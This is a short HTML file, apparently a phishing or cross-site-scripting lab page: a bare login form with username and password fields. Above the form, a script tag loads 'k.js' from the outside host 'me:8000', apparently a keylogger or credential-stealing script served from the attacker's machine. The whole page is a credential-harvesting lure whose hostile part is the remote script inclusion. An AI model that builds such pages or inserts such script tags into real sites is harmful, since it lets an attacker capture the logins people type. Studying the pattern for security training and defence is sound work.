<!DOCTYPE html>
<html lang="en">

<body>
    <script src='http://me:8000/k.js'></script>
    <form>
        Username: <input type="text" name="username" /><br />
        Password: <input type="password" name="password" /><br />
        <input type="submit" value="Login" />
    </form>
</body>

</html>